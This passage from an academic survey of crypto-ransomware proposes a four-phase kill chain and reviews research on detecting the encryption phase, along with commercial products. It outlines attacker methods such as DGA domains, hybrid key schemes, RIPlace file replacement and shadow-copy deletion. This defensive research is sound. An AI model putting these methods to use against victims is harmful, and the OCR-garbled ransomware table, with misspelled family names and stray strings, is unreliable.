misconceptions when approaching the topic of crypto-ransomware. * We present the need for a better organized cyber kill chain that describes the modern crypto-ransomware attack. * We propose a needs-based, field-informed contemporary cyber kill chain. For completeness, an apt description and classification of cryptographic ransomware attacks in their methodologies and phases will be presented with a brief classification of detection techniques. ## 2 On crypto-ransomware behavior and methodology The crypto-ransomware attack is characterized by a specific action of encrypting victims' data with the intention to extort financial or other benefits as a ransom for decryption. Researchers have observed distinct actions that mark noticeable separate phases of a ransomware attack (Moussaileb et al., 2021; Berrueta et al., 2019; Al-rimy et al., 2018; Eze et al., 2018). After a careful examination of different proposals for ransomware-specific kill chains, as well as the growing tendency of ransomware groups to carefully choose the target and emulate Advanced Persistent Threat (Sophos, 2021), we synthesized our findings and, as a result, identified four distinct phases of a crypto-ransomware attack. Our proposal for a kill chain is shown in Fig. 2. ### Phases of the attack There are many other surveys of ransomware used kill chains with different numbers and scopes of phases. We propose a kill chain with four distinct steps or phases for a ransomware attack. The kill chain, presented in Fig. 2, was found to be the best fit to focus on detecting encryption as a defining characteristic of cryptographic ransomware attacks. The following section will explain in detail the essential characteristics of each of the four phases of our kill chain, namely initial compromise, Establishing foothd, Encryption, and Extortion, to present ransomware's lifecycle and emphasize the importance of the Encryption phase. #### 2.1.1 Initial compromise Initial compromise marks the phase in which a ransomware attack compromises the first computer. Various methods for delivering and executing initial compromise include phishing, paper-phishing, corrupt web pages, and actual security bugs and system misconfigurations (vulnerabilities). Fig. 3 shows the most common methods of initial compromise based on original research by the authors, covering the years between 2013 and 2021. As presented in Fig. 3, phishing is the most common method for initial compromise, often combined with exploiting vulnerabilities or corrupted websites. Locky and TeslaCrypt ransomware (Berrueta et al., 2019) utilize dynamic generation algorithms (DGA) to create domain names dynamically. DGA's purpose is to make it difficult for defenders to discover and block C2 servers' names and/or IP addresses. In order to keep its activity hard to detect and yet avoid total randomness, the DGA is using some of the following building elements: * Seed, which can be a word(s) and/or number(s), is a building element introduced by ransomware DGA writers, and it can be changed to segregate C2 domain names between different versions or groups of victims. * Time-based is the element that changes dynamically with time. It does not need to be necessarily influenced by time or date, and some other event can trigger it; the only condition is that it changes over a period of time. * Top-level domains (TIDs) are the final part of DGA-created domain names. The first two create the body of a domain name by being combined, and then a predetermined TLD is added. TLDs like "xyz," -top," and "bid" are very popular when creating DGA (Antra, 2016). Ransomware C2 servers' communication plays a prominent role in many proposed ransomware detection mechanisms that detect C2 IPs and domain names in the ransomware tools and network traffic. These can be used in activities from deny-listing all the way to detecting DGA-created domain names in DNS queries to be used with DNS sinkholes (Dynamic Resolution: Domain Generation Algorithms, Sub-technique T1568.002 - Enterprise | MITRE AT&CK@). #### 2.1.3 Encryption The Encryption phase of a ransomware attack includes the following phases: encryption key generation, obtaining a public key from the C2 server, searching file system, encryption, exfiltration of data with specific extensions or in particular folders, and deletion of possible backups like shadow volumes. Different ransomware families use various encryption schemes to encrypt their victims' data. Whether the attacker chooses to use symmetric, asymmetric, or a combination of both encryptions directly influences cryptographic key generation and management during the Encryption phase of the attack. Table 1 names prominent ransomware families since 1989 and their choice of encryption. The distribution of cryptographic methods with symmetric and a combination of symmetric and asymmetric are most commonly used, while asymmetric alone is used much less. While researching sources for information contained in Table 1, the authors have compiled data from these sources to create Fig. 4, which shows the distribution of various encryption algorithms' usage from the first ransomware attack in 1989 to the end of 2021. In the case of exclusive symmetric encryption use, key generation is done by either using local operating system cryptographic capabilities or a custom implementation of cryptographic algorithms. In Microsoft Windows, ransomware uses the function BCrypt-GenRandom Cryptography API: Next Generation (CNG), as exemplified by Noberus ransomware (Noberus) or CryptGenRandom - Maze ransomware (Ransomware Maze, 2020). In Apple's macroS and IOS, the SecRandom function carries similar capabilities to CryptGenRandom and Linux, along with several other UNIX-like operating systems that implement getrandom as a system call. Ransomware for the latter operating systems uses open source libraries like medeths - examples seen in KeRanger (New OS X Ransomware KeRanger Infected Transmission BitTorrent Client Installer, 2016) and RansomEXX (RansomEX Trojan attacks Linux systems, n.d.) ransomware re. The secret key is sometimes protected when utilizing an asymmetric encryption scheme in remote secure storage. In the case of the local generation of keypair, the secret key is encrypted with another C2-provided public key. The public key is either locally generated with a secret key, supplied by a C2 server, or both. Ransomware like Cerber used C2 supplied RSA public key to encrypt locally generated RSA secret key that was used to encrypt locally generated RC4 key used for victim's files encryption (Sala). On the other hand, CryptoWall ransomware would not start encryption unless a 2048-bit RSA key is received from C2 (Cabaj et al., 2015). In most cases, successful ransomware attacks combine symmetric ciphers like Rijndael, ChaCha/SalaS20, or RC4 together with asymmetric ciphers like RSA or ECC. This is primarily due to the speed of encryption advantage that symmetric cipher provides over asymmetric encryption when encrypting a large volume of data. In scenarios where the secret key remains on C2, asymmetric encryption is a good option to encrypt the symmetric key. This way, the victim's responders to that attack would not be able to use it in decryption before paying the ransom. The speed is also a factor in locating the files to be encrypted by ransomware. Some attackers infect all drives alphabetically (in Windows-based attacks), while some limit infection to specific user folders like Desktop or Documents. Most sophisticated ransomware provides whitelist exclusion of specific system folders and system configuration files to maintain the operating system's functionality after the encryption (Lemmou et al., 2021). During the actual encryption, ransomware applies four tactics: reading, encrypting in memory, writing to the file system, and removing original files. While reading a file, ransomware like CryptoWall tries to read files in one read, reducing the number of read/write operations (Lemmou et al., 2021). On the other hand, ransomware can use fixed block lengths for reading and writing files during encryption. Wannxry or LockerGog ransomware read files in 256 kb and 64 kb blocks, respectively (Loman, 2019). The third approach to encryption is when ransomware performs a read of the fixed buffer from the beginning or from the end of the file twice before committing a write to the file system. This behavior has been observed in ransomware Spora which uses two read operations checking for ransomware added specified values to the content of each file before encryption from the end to establish if the file is already encrypted (Lemmou et al., 2021). Finally, ransomware can write directly to the original file and then optionally rename it during the destruction of the original files. Another way of destruction is by saving encrypted files in the new location and then deleting, moving, or overwriting the original. Also, the third method includes moving the original file to some temporary location, overwriting it with encrypted data, and then moving it back to its original place in the file system. RIPlace is a new technique of replacing the original files with encrypted files that have been able to bypass all of the known protection systems for the Windows family of operating systems (CISOMAG, 2019). Found in ransomware like Thanos (Walter), the Figure 4: Usage of encryption algorithms by major ransomware families 1989 - 2021 RIPace utilizes IRP_MJ_SET_INFORMATION system callback in combination with the legacy DefineDosDevice function to delete original files. At the same time, renaming is performed on both original and encrypted files. Deletion of backup files most commonly occurs with the deletion of Windows Volume Shadow Copy using operating system tools or through encryption of shared drives when some sort of NAS solution is deployed for backup purposes. #### 2.1.4 Extortion Once the files are entirely or, in some cases, partially encrypted, the ransomware creates a ransom note as a text or HTML file instructing the victim on what to do in order to retrieve their data. Payment of ransom in the extortion phase of ransomware attack has represented difficulty for cyber-criminals since ransomware's first appearance in 1989. The inability to remain anonymous has pushed early ransomware attackers to use payment means like premium-rate text messages or pre-paid vouchers like Paysafe cards (Oz et al., 2022) in the times before the appearance of cryptocurrency. After the introduction of BitCoin in 2009, most ransomware attackers moved towards cryptocurrency ransom payments in the Extortion phase of the attack. In 2012, locker ransomware Reveton was the first Ransomware-as-a-Service (RaaS) and the first ransomware to demand payment in BitCoin. Among cryptographic ransomware, Cryptolocker in 2013 was the most advanced and among the first to strongly emphasize payment by BitCoin (Liao et al., 2016). The section 2.1 has outlined the main characteristics of all four kill chain phases. We identified the most common instances of crypto-ransomware behavior and methodology. However, in order to adapt this kill chain into actionable recommendations necessary for the effective prevention of ransomware, the following sections will introduce a novel approach where the focus in detecting ransomware is concentrated on the detection of Encryption as conceptualized in the previous section. ## 3 Detection of encryption Research in detecting ransomware in general through various phases of attacks has snowballed in the past several years. Focused research on cryptographic ransomware follows a general trend of the tremendous increase in published research; however, most surveys remain focused on all attack phases described previously in section 2.1. Encryption is the defining characteristic of a cryptoc-ransomware attack. The usage of different encryption algorithms, as shown in Fig 4, choice of symmetric, asymmetric, or combination (hybrid) of different encryption schemes, as shown in Table 1, shows how cryptographic ransomware closely followed the trend in its evolution and how encryption itself continues to be the one differentiating characteristic that is the most obvious candidate to be the factor in the detection of the attack. When researching the phenomenon of cryptographic ransomware through time, we observe that despite the evolution of this threat from malware to something similar to advanced persistent threat (APT), encryption remained a uniquecharacteristic that separates this ransomware from other information security threats. The capability to encrypt without any control gives ransomware attackers the primary motivation and purpose for executing the attack. With that in mind, we surveyed and classified methodologies used to detect ransomware while operating inside the Encryption phase of the attack. The scholarly literature on ransomware detection largely clusters around the following three major groups: * API and system call monitoring-based detection * 1/0 monitoring-based detection * file system operations monitoring-based detection that include * scanning for high entropy in files and * monitoring deception tokens in file system-based detection. Machine learning (ML), even though sometimes covered as a separate methodology in encryption detection, is cross-cutting the three previously mentioned methodologies depending on informa \begin{table} \begin{tabular}{p{34.1pt} p{142.3pt}} \hline \hline Encryption scheme & Ransomware families in chronological order \\ \hline Symmetric encryption & AIDS trojan (PC Cyborg) (Case Study), GPCode (Emm, 2008), Crypzip (Cryzip Ramsonware Trojan Analysis), MayArchive \\ & (MayArchive Descriptor | F-Secure Labs), Symplectouer (Ameer et al., 2018), TeslaPCuper (Iemman and E. M. Souidi, 2018), ToMe (Meet "Tox", 2015), Terrentrodtocker (Wyke and Ajana, 2015), DMALocker (Rahgerton et al., 2021), Korfit (Reshri, 2021), Jigsaw (Conti et al., 2018), Cerpetu (Pielnot et al., 2018), CryptOX (Berreta et al., 2019), Enigma (Berreta et al., 2019), Bart (Reshri, 2021), Footnote 2.1.1.1.1.1.2.1.2.1.3. (Ekornetas et al., 2019), Stat (Reshri, 2011), Spora (Labs, 2017b), KIIbS(Linux) (Conti et al., 2018), Cryptyshoak (Reshri, 2021), DoubleTocker (Iipovskiy et al., 2018), Cryptyshoak (Bernreta et al., 2019), Pactcher (Ransomware Recap), Rewenge (GoldSparrow, 2017), BTCware (Wood and Eze, 2020), ErbEu(Wijn) (Ransomware Recap), Wannaker (Hui et al., 2020), Gibon (Globson Ransomware), Locker (Berreta et al., 2019), Retwawge (Reshmi, 2021), Sactra (Berreta et al., 2019), Netwalk (Take a NetWalk) (Meet, 2020), Try2Cry (Try2Cry Ransomware - IBM X-Force Collection), EKING (Zhang, 2020), Conti (Conti Ransomware), LV (Iwanwanware), 54B847Rollicka(Karcine Atkingt: Meet the Sabbath Ransomware Affilitate Program, Again | Mandiant) Archivesives (See Study), Cryptoberse (Heng and Balmins, 2016), CryptoWahl (Cabaj et al., 2015), Virkork (crypto version) (Zavarsly and Lindslog, 2016), CryptoWahl (Berreta et al., 2019), Linux.Encoder (Berreta et al., 2019), Chimera (Conti et al., 2018), SANSam (Berreta et al., 2019), Globenproster (Berreta et al., 2019), Hermez1.3 (Shevchwe et al., 2017), Katyush (Reshri, 2021), Thaosos Ransomware, (2020), Hwe (Walter), NetwmV (N37WORM) tansomware emerges in new of cyberattacks in Israel \\ Combination of symmetric and asymmetric encryption & GPCode (Blackamaleri), Cryptooker (Hansherry et al., 2014), CTSlocker (Weckstein et al., 2016), DMALocker4.0 \\ encryption & (Raheem et al., 2021), Lockey (Almashhadani et al., 2019), Petya (Aiden et al., 2017), KeRanger (Conti et al., 2018), Anubis (GoldSparrow, 2016), Matrix (Threat Assessment, 2021), KillDisk(Wijn) (Conti et al., 2018), Sage (Labs, 2017c), ErbEu(Linux) (ErbEu's Resources as Linux Ransomware, 2017), Wannander (Chen and Bridges, 2017), Crysis (Crisis Zansomware Gaining Football, Setsights to Take Over TestScript - Wiadomonol) iepez tion used as features in the dataset that the ML model is trained on. The usage of machine learning in ransomware detection is prevalent in hybrid proposals that employ data from different groups. The same is true for detecting activities in the Encryption phase of the attack. While some of the proposals are included in the survey for their specific use and discussion of machine learning issues related to the detection of ransomware pre-encryption and encryption activities, often in combination with other methods, categorization to each major group that was described previously was done based on the models' input features. ML ransomware encryption detection includes machine learning techniques and algorithms used to detect encryption and related activities by ransomware attacks in hybrid and pure implementations. The following section presents the state-of-the-art methodologies used to detect ransomware inside the Encryption phase of the attack. ### API and system calls monitoring Monitoring of function and system calls to detect activity related to file encryption aims at detecting encryption at early stages. At this point, API functions and system calls related to encryption operations appear in the dynamic monitoring of events in an operating system or static analysis of binary files. Depending on the operating system, the dynamic detection mechanism focuses on API functions or system calls, and static analysis employs a more comprehensive observation for a set of function calls and text strings. This method is often part of a hybrid solution for ransomware detection. While proposing machine learning solutions for static and dynamic analysis of files suspected of being ransomware, Sheen and Yadav (2018) identified ransomware's most commonly used API calls. Table 2 presents those API calls in detecting the Encryption phase of ransomware attacks with a brief explanation of their purpose in the Windows operating system. Their solution's performance was measured on the ML model's success in differentiating between benign and malicious utilization of all defined features. In contrast, these API functions were also found in other research. Some authors propose a detection model for ransomware using monitoring API calls and developing pre-encryption detection algorithms (Yadav et al., 2021). Even though their paper outlines methods and goals, it still needs to provide concrete solutions. Others use NLP (Natural Language Processing) using convolutional neural networks to analyze API sequences extracted from both ransomware and benign processes in the secure sandbox (Qin et al., 2020). Observing sequences of API calls in machine learning solutions was also applied by Ahmed et al. (2020), in their enhanced Minimum Redundancy Maximum Relevance methods, and the most relevant features fine-tuned from system calls were not necessarily encryption-related. Similarly, Almousa et al. (2021) consolidated Windows operating system API calls found in 51 collected ransomware families with common API calls in software to train machine learning models to detect ransomware. In the case of Mehnaz et al. (2018), with their RWGuard proposal and CryptoAPI Function Hooking (CFHK) Module, they implement a technique of intercepting CryptoAPI calls by hooking function through memory address space, shifting and mandatory JMP instructions intercepts, and securely stored CryptoAPI activities. Kok et al. (2020a) focus their research on extracting API calls in various ransomware samples prior and the call of APIs containing the word 'crypto' while the sample was running in a sandbox. Their pre-encryption detection algorithm used a machine learning model trained on the extracted API calls dataset. The limitation of their algorithm is its reliance on Windows API calls which disable them in order to detect ransomware by using custom encryption functions. Another example of looking at pre-encryption API calls is the work of Al-Rimy et al. (2020), who established a two-component detection system consisting of DynamicPre-encryption Boundary Definition (DPBD) and Features Extraction (FE). The former creates the pre-encryption boundary vector with all cryptography-related APIs used to create the boundary of the pre-encryption activities that define the boundary of pre-encryption. The latter extracted all relevant pre-encryption features for use in detection. Araba et al. (2020) observation of API calls by DLIs in Windows in their hybrid solution proposal pointed out the correlation between process behavior and ransomware activity in the pre-encryption and encryption stages. A similar proposal, focusing on the Android operating system, came from Scalas et al. (2019), who argued that using System API observation in detection systems performs better than complex solutions that combine more complex ransomware indicators. On the static observation of API functions related to encryption, Xu et al. (2017) proposed CryptoHunt deals with obfuscation in binary files that prevents detecting Windows Cryptographic API or OpenSSL functions. While this proposal was resilient to various obfuscation techniques, some crucial elements of the process, detecting custom cryptographic functions, were not described. API monitoring and system calls are also widely used as input features in machine learning-based detection of activities in the Encryption phase. In their proposal, Al-Rimy et al. (2021) argue that feature extraction in the early Encryption phase of a ransomware attack and phases before creating a situation of too few data and high dimensional features leads to a substantial risk of overfitting. As a remedy, they proposed "a novel redundancy coefficient gradual up \begin{table} \begin{tabular}{l l} API Calls & Description \\ \hline FindFirstChangeNotificationA & Creates a change notification handle and sets up initial change notification filter conditions. Await on a notification handle \\ & succeeds when a change matching the filter conditions occurs in the specified directory or subtree. \\ SHEmptyRecycleBinA & Emptes the RecycleBin on the specified drive. \\ SHFileOperation & Copies, moves, renames, or deletes a file system object. \\ SHHowseForFolder & Displays a dialog box that enables the user to select a Shell folder. \\ SHLoadInToC & Creates an instance of the specified object class from within the context of Shell’s process. \\ SHGetFileInfo & Retrieves information about an object in the file system, such as a file, folder, directory, or drive root. \\ SHQueryRecycleBinA & retrieves the RecycleBinx size and the number of items in it for a specified drive. \\ SHPathPreorderWriteA & Checks to see if the path exists. This includes rerunning mapped network drives, prompting for ejectable media to be reinserted, creating the paths, prompting for the media to be formated, and providing the appropriate user interfaces, if necessary. \\ SetUserFileEncryptionKey & Sets the user’s current key to the specified certificate. \\ EncryptionKey & EncryptiFileA & Encrypts a file or directory. All data streams in a file are encrypted. All new files created in an encrypted directory are encrypted. \\ DecryptiFileA & Decrypts an encrypted file or directory. \\ OpenRecryptiFileRawA & Opens an encrypted file in order to backup (export) or restore (import) the file. This group of Encrypted File System (EFS) \\ & functions is intended to implement backup and restore functionality while maintaining files in their encrypted state. \\ FileEncryptionStatusW & Retrieves the encryption status of the specified file. \\ \end{tabular} \end{table} Table 2: A list of the most significant Windows API calls for crypto-ransomware detection was collected from surveyed papers. weighting approach." The calculation of redundancy terms of mutual information was introduced to improve the feature selection process and enhance the accuracy of the detection model. The experiment showed better accuracy with the proposed approach by testing multiple classifiers in all cases. Similarly, Hwang et al. (2020) propose two-stage detection of crypto-ransomware, first building the Markov model from Windows API call sequence patterns capturing the characteristics of transomware behavior and then using a Random forest classifier over remaining data (registry keys operations, file system operations, strings, file extensions, directory operations, and dropped file extensions) to control false-positive and false-negative rates. Their two-stage mixed detection model gives 97.28% overall accuracy, 4.83% false-positive rate, and 147% false-negative rate. Also, Kok et al. (2020), as an extension to their already mentioned proposal of the Pre-encryption Detection Algorithm (PEDA), proposed a set of conventional and unconventional metrics for PEDA's learning algorithm (IA) component performance. By introducing metrics like Likelihood Ratio (LR), Diagnostic odds ratio (DOR), Youden's index (J), Number needed to diagnose (NND), Number needed to misdiagnose (NNM), and net benefit (NB), they improved the performance in this unique use case when compared to using only conventional metrics. Al-rimy et al. (2019) focused on pre-encryption activities detection in their proposal for a crypto-ransomware detection model. They proposed two combined approaches, the first incremental bagging (iBagging) technique and enhanced semi-random subspace selection (ESRS), which act as an ensemble model. Biagging creates subsets depending on the observation of ransomware behavior, while ESRS then creates subspaces that were used to train a pool of classifiers. The best classifiers were modeled using a grid search, and a voting system was employed. While accuracy was higher than in competing approaches for the same datasets, there were limitations related to feature selection in different subspaces. Since the features were selected within one subspace independently, the same feature could be selected in more than one subspace. This decreases the accuracy of the model. Although this literature is very developed and ever-growing, it still needs a comprehensive focus on researching the detection of Encryption phase-related activities in the case where encryption algorithms are custom-implemented using third-party libraries. The development of static analysis methods, as well as the discovery of patterns in API and system calls for dynamic analysis when custom encryption implementation is used, would significantly improve the overall success of this method. ### I/O (input/output) monitoring Monitoring I/O is another technique that monitors internal behavior in an operating system. It aims to use information from 1/O requests related to memory, file system, and even network for the detection of ransomware encryption (and other phases). Like API and system calls monitoring, this technique is often part of a more comprehensive detection solution involving several different methodologies and techniques. Kharaz et al. (2016) used a combination of techniques and methodologies in their proposal for a detection system named UNVEIL Their monitoring of I/O established that regular applications could generate I/O access requests generated by ransomware encryption tools. However, due to the common design where these regular applications do not block access to the original files, their sequence patterns of I/O operations differ from ransomware. The paper also describes zero-day ransomware detection by observing entropy between read and write operations. McIntosh et al. (2021), as a part of the broader proposal for an access control framework, utilized I/O monitoring using various models of the framework name RANACO. Their solution nested its modules between Windows I/O and Storage class driver. While the overall framework proposed has limitations, the I/O monitoring part is said to detect encryption successfully. RW-Guard by Mehnaz et al. (2018) implements a hybrid solution with IRParser that logs I/O requests and passes them further to other modules. Network monitoring is also used to detect pre-encryption and encryption events. Almashhadani et al. (2019) proposed network-based crypto-ransomware detection using Locky ransomware as the case study. Their proposal was built using multiple independent classifiers over both packet and flow data. Using a total of 18 features that were extracted from TCP, HTTP, DNS, and NBNS traffic, the proposal achieved 97.92% accuracy for packet-based and 97.08% accuracy for flow-based data. By using TCP and UDP features computed from network flows, Fernandez Maino et al. (2019), as a continuation of their previous proposal for an integrated clinical environment named ICE++, proposed a machine learning detection and protection system that was capable of anomaly detection and ransomware classification. It also uses Network Function Virtualization (NFV) and Software-Defined Networking (SDN) paradigms to prevent the spread of crypto-ransomware activity. They trained multiple models using multiple algorithms and achieved a precision/recall of 92.32%/99.97% in anomaly detection and an accuracy of 99.99% in ransomware classification. Roy and Chen (2021) proposed a solution named DeepRan that prevents the spreading of the Encryption phase across network-connected computers. DeepRan utilizes attention-based bi-directional Long Short Term Memory (BiLSTM) with a fully connected layer to model the normalcy of networked hosts. Its behavior anomaly detection processes substantial amounts of logging data collected from bare metal servers. Conditional Random Fields (CRF) model was used to extend BiLSTM for detected anomalies to be classified as potential ransomware attacks. Semantic information extraction from "high dimensional host logging data" was done by the Term Frequency-Inverse Document Frequency (TF-IDF) method. Early ransomware detection had a 99.87% detection accuracy (F1-score of 99.02%). On the hardware monitoring level, Paik et al. (2016) propose monitoring I/O for encryption detection in addition to their SSD hardware monitoring. Similarly, Dimov and Toshev (2020) monitor HDD performance and utilize the I/O performance rate for disk read and disk write operations to detect ransomware in the Encryption phase. Finally, as a unique type of I/O monitoring, Park and Park (2020) propose hardware tracing for detecting symmetric key cryptographic routine detection in malicious binaries that employ anti-reverse engineering techniques. Azmoodeh et al. (2018) proposed detecting crypto-ransomware activity in IoT by monitoring power consumption and applying machine learning models to the collected data. Their proposal employs Dynamic Time Warping (DTW) as a distance measure with KNN as a classifier, outperforming conventional classifiers like Neural Networks, KNN, and SVM. Their approach achieved a detection rate of 95.65% and a precision rate of 89.19%. Only a few research papers that include I/O monitoring in relation to detecting activities related to the Encryption phase of a ransomware attack are available. The success of some of the mentioned proposals in detecting encryption as activity and overall events that are a consequence of the Encryption phase indicates that much more can be done in this field and that more innovative hybrid solutions are possible. ### File system monitoring Monitoring file system activity to detect the Encryption phase of ransomware attacks focuses on collecting information about the state of the file system and the files themselves. The early ideas, like Young et al. (2012), to use different sector hashes to detect target files, including encrypted files, paving the way for file system usage in the fight against cryptographic ransomware. By using raw binary files as ML features, Khammas (2020) proposed a Random Forest classifier that uses 1000 n-gram features extracted directly from raw bytes using frequent pattern mining. The selection of features was made using the Gain Ratio to reduce the dimensionality of features. The proposal maintains an optimal number of trees to be 100 with achieved accuracy of 97.74%. While this proposal focused on the analysis of binaries that contain ransomware attack tools and recognition of the same among benign binaries, due to the nature of crypto-ransomware behavior, it is safe to assume that many of the n-gram features were related to the Encryption phase. Furthermore, using APK files containing the source code of an Android app, Sharma et al. (2021) extracted features from the file related to ransomware attacks. Their proposal, named RansomDroid for detecting crypto-ransomware activity in Android devices, uses an unsupervised machine learning model. Unlike K-Means clustering, the proposal used a Gaussian Mixture Model with a flexible and probabilistic approach to modeling the dataset. Feature selection and dimensionality reduction for improvement of the model were also utilized. The model detects Android ransomware with an accuracy of 98.08% in 44 ms. Almomani et al. (2021) also use analysis of Android APK files for feature extraction in their proposal. They rely on an "evolutionary-based machine learning approach" to detect cryptographic ransomware. The solution includes monitoring the file system for optimization algorithm (BPSO) to tune the classifier's hyperparameters and feature selection. Synthetic minority oversampling technique (SMOTE) with support vector machine (SVM) algorithm was used for classification. The combination name SMOTE-tBPSO-SVM used g-mean as a metric and achieved a result of 97.5%. Tang et al. (2020) proposed a detection and prevention system named RansomSpector that monitors the file system and network activities. It is a virtual machine-based system that resides in the hypervisor, thus making it difficult to bypass through privilege escalation. The crypto-ransomware was detected with extraordinarily little overhead to performance - less than 5%. Continella et al. (2016), in their proposal for ShieldFS, offer a whole new file system, which, combined with the machine learning portion of their proposal, can detect ransomware behavior as an anomaly, including operations related to the Encryption phase. Similarly, Lee et al. (2022) proposed statistical analysis to differentiate between regular and encrypted blocks in the file system. Their solution, Rcryptect, utilizes extracted heuristic rules using FUSE (File system in Userspace) to avoid kernel modification. Rcryptect, among the other methods, detects high entropy files created by cryptographic operations. Nevertheless, the solution faces common issues of false positives for benign files with high entropy and the issue that prevention mechanisms can cause damage to some files under attack before the ransomware encryption process is killed. Entropy, in combination with fuzzy hashing, as a means to detect files encrypted by ransomware in the file system was proposed by Joshi et al. (2021). They used a mini-filter driver that interacts with file system behavior as kernel mode. While achieving more than 95% of detection success in their experiment, the method is susceptible to explorereze process DLI injection that would bypass the security measures proposed. Lee et al. (2019) use entropy estimation to detect files encrypted by ransomware in a cloud environment. When using the cloud as a backup, there exists a risk that encrypted files could be synchronized to the cloud. The authors thus observed the number of ransomware encryption attacks and dwhyled the baseline used in entropy estimation over files in the cloud. Their experiment reported a 100% success rate in detecting encryption. Jung and Won (2018) used the entropy of files in their comprehensive ransomware detection and protection system. They utilized context-aware analysis that used information from APIs, file system metadata, systems to detect large-scale read/write operations, and entropy analysis capable of detecting benign usage of encryption with enhanced classification to improve entropy analysis results. Similarly, Jethva et al. (2020) proposed their system to detect and prevent crypto-ransomware using entropy in multilayer detection. The technique was combined with monitoring registry key operations, file signatures in the Windows operating system, and machine learning. By improving the already mentioned method of analyzing the entropy of files, Hsu et al. (2021) examined 22 different file formats of encrypted files and extracted features to be used with the Support Vector Machine algorithm. They achieved a detection rate of 85.17% using the SVM Linear model, which increased to over 92% when using the SVM kernel trick (with the polynomial kernel) model. Not all of the research favors entropy use in detecting ransomware encryption. McIntosh et al. (2019) propose depreciation of this method in the fight against ransomware, arguing that techniques they identified to mitigate entropy usage in encryption detection are sufficient to invalidate reliance on entropy information. In their experiment, BASE-64 encoding and partial file encryption have shown their effectiveness in "confusing" entropy information; thus, the usage of File Integrity and File Type Identification have been proposed as alternatives to using entropy measures. RWCuard is a proposal by Mehnaz et al. (2018) that combines multiple techniques in the real-time detection of cryptographic ransomware. The solution includes monitoring the file system for malicious activity through File Monitoring and File Classification modules. Also, it has the capability to automatically generate decoy files in the file system using a feature called Decoy Fies Generator. Some of the techniques used for detection are inherently probabilistic and prone to false positives. Another decoy-in-the-file-system-based solution is the proposal of R-Locker by Gomez-Hernandez et al. (2018), a novel approach to creating _honeyfiles_ as decoys to detect and stop ransomware in action. To achieve this in practical implementation on UNIX-like operating systems, a new named pipe is created in the file system containing a specially crafted small-size honeyfile. An alert is raised to kill the process when ransomware attempts to read the file. Due to the fact that the kernel manages synchronization, these regular applications do not block access to the original files between reading and writing; if a process attempts to read more data than expected, reading is blocked until the writer makes up for expected data. This feature allows time to raise alerts about suspected ransomware behavior. In another approach using deception, honeypots for IoT devices were proposed by Sibi Chakravarthy et al. (2020) based on Social Reoperator Algorithm (SoLA) to model honey folders. The Intrusion Detection Honeypot (IDH) also introduces an Audit Watch module that monitors the entropy of files in the device, together with a module called Complex Event Processing (CEP) that collects information from multiple external security sources used to confit and stop ransomware activity. SoLA algorithm is critical to this proposal with its capabilities to process extracted features from processes that accessed the honey folder. Usage of entropy to detect encryption is present in various operating systems, including Android. A proposal by Jiao et al. (2021) detects custom encryption with an accuracy rate of 98.24% in Android platforms using only entropy information. In a more ML-focused approach, using the activity logs for features extraction that contain all of the filesystem events, Homayoun et al. (2020) proposed applying Sequential Pattern Mining to find Maximal Frequent Patterns (MPF) in logged activities for known ransomware. This created candidate features to be used in classification by multiple machine learning classification algorithms. In their experiment, authors used J48, Random Forest, Bag ging, and Multi-Layer Perceptron (MLP) classifiers and achieved an F-measure of 0.994 with a minimum AUC value of 0.99 in the detection of ransomware samples from benign activities using Windows registry, DLL, and file system to registry log of activities. F-Measure of more than 0.98 with a false-positive rate of less than 0.007 in the detection of a given ransomware family using 13 selected features whose significance was recognized during the research. Their results were not short of impressive, creating datasets of ransomware logs for 1624 ransomware binaries sourced from virustotal.com, as well as separate sampling for overfitting. However, no indication was given that testing was performed on an independent dataset. Even though an impressive amount of research has been found in relation to file system monitoring for the purpose of detecting the Encryption phase activities in a ransomware attack, we feel that research went truly little in the direction of tying the techniques mentioned above into access control systems used to control file systems. Entropy detection is an auspicious tool in fighting cryptographic ransomware; more proposals are needed on this topic. ### Commercial solutions brief survey Most of the commercial offering for protection against cryptotransomware focuses on providing capabilities in the area of Enterprise Backup and Recovery. Companies that focus solely on ransomware protection in their products are almost nonexistent. Many vendors focus on delivering recovery capabilities through air-gapped backup and immutable backup copies, and detection is based chiefly on integrity and anomaly behavior monitoring. Even though vendors offer markets as comprehensive data protection solutions, it is indicative that most of them emphasize that the backup is the last line of defense against ransomware, which in some instances indicates that other ransomware protection controls are expected to be in place for the product to live to its expectations. According to Gartner's Magic Quadrant for Enterprise Backup and Recovery Software Solutions (Rao et al., 2021), the major capability for the evaluation of a product was Ransomware detection and protection. An example is Aronis (Ransomware Protection with Backup for Business - Acronis) which offers both cloud-based and on-premise solutions that include the capability to actively scan for ransomware activity and verify the authenticity and recoverability of backup copies. Another major player in this field is Arcresure (Ransomware Protection Solution for an Impenetrable Business) which does not have its own capabilities to detect and protect against crypto-ransomware built into its product but rather has excellent cooperation with security giant Sophos that provides the capability for them. Cohesive (Ransomware Recovery) | Reduce Downtime with Rapid Recovery) is the leader in enterprise backup and recovery. They offer cloud service with immutable backup using the write-once-read-many (WORM) feature and RBAC access control model. Also, they utilize machine learning for anomaly behavior detection to detect crypto-ransomware activity. Commvault Ransomware Recovery - Commvault offers one of the most comprehensive lists of capabilities against ransomware. Their approach employs a zero-trust model, built architecture using NIST's Cybersecurity Framework (CSF). Their detection capability mostly relies on anomaly detection in both networks and file systems. Dell Technologies (Dell EMC Cyber Recovery Solution - Cyber and Ransomware Data Recovery), another leader in this vertical, provides detection using their Intelligent CyberSense Analytics. It utilizes machine learning for anomaly detection. Other important vendors and leaders in this area, like Veeam (Ransomware Protection: Learn How Veeam Can Protect Your Data) and Rubrik (Ransomware Recovery), use similar techniques, and there are no serious differentiating factors in detecting crypto-ransomware. Other groups of vendors that focus on ransomware detection are traditional threat detection and response companies. They rely on anomaly detection utilizing various monitoring techniques that provide hybrid solutions of API calls and I/O monitoring, and file system changes. Some are using machine learning models, and there are occasional claims of artificial intelligence (AI) that are difficult to confirm. The most significant ones are Carbon Black (Endpoint Protection Platform | VMware Carbon Black Endpoint), Trend Micro (Enterprise Ransomware Protection & Removal), Darktrace (Darktrace for Ransomware), Extrahop (Ransomware Mitigation & Detection Solution - ExtraHop), and Vectra AI (Ransomware Detection and Response - Ransomware Solutions | Vectra AI). Concerning the relationship between academic research achievements surrounding the detection of ransomware executing the pre-encryption and encryption activities and commercial solutions, it has been noted and observed that an apparent discrepancy exists between the two (Scala et al., 2019; Nicol et al., 2015). The persistence of these differences is not uncommon in cybersecurity-related topics and has been driven by a series of factors categorically branched into categories. Therefore, we have factors that are technical, procedural, or bureaucratic in origin and nature. Amongst those most substantially addressed by the literature are the factors identified as distinctly technical in origin: * Integration Industry 